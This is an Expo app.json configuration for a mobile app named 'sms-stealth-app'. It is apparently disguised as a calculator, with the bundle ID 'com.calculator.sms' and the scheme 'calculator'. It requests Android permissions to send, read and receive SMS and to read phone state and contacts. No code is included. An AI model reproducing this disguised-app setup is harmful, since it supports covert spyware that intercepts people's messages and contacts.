{
  "expo": {
    "name": "sms-stealth-app-lhivoq",
    "slug": "sms-stealth-app-lhivoq",
    "version": "1.0.0",
    "orientation": "portrait",
    "icon": "./assets/images/final_quest_240x240.png",
    "userInterfaceStyle": "light",
    "splash": {
      "image": "./assets/images/final_quest_240x240.png",
      "resizeMode": "contain",
      "backgroundColor": "#F5F5F5"
    },
    "assetBundlePatterns": [
      "**/*"
    ],
    "ios": {
      "supportsTablet": true,
      "bundleIdentifier": "com.calculator.sms"
    },
    "android": {
      "adaptiveIcon": {
        "foregroundImage": "./assets/images/final_quest_240x240.png",
        "backgroundColor": "#F5F5F5"
      },
      "package": "com.alscomany.com",
      "permissions": [
        "android.permission.SEND_SMS",
        "android.permission.READ_SMS",
        "android.permission.RECEIVE_SMS",
        "android.permission.READ_PHONE_STATE",
        "android.permission.READ_CONTACTS"
      ]
    },
    "web": {
      "favicon": "./assets/images/final_quest_240x240.png",
      "bundler": "metro"
    },
    "plugins": [
      "expo-router",
      [
        "expo-build-properties",
        {
          "android": {
            "compileSdkVersion": 35,
            "targetSdkVersion": 35,
            "buildToolsVersion": "35.0.0",
            "kotlinVersion": "1.9.10",
            "javaVersion": "VERSION_17"
          }
        }
      ]
    ],
    "scheme": "calculator"
  }
}